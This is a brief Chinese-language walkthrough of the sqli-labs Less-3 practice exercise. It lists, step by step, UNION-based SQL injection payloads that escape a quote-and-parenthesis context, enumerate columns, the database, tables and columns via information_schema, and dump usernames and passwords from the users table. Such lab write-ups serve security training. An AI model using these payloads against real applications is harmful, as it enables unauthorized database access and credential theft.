#sqli-labs#Less-3

总目录：戳一戳

Less-3 GET -Error based -Single qutoes with twist

• 首先试了一下?id=1’，发现报错里面多了个括号
  
• 爆字段：?id=1’) order by 3%23
  
• 爆字段位置?id=0') union select 1,2,3%23
  
• 爆库?id=0') union select 1,2,database()%23得到库名：security
  
• 爆表?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23,题目要求id，应该是users，用户数据表
  
• 爆列?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' %23
  
• 爆数据?id=0') union select 1,2,group_concat(username,0x3a,password) from users%23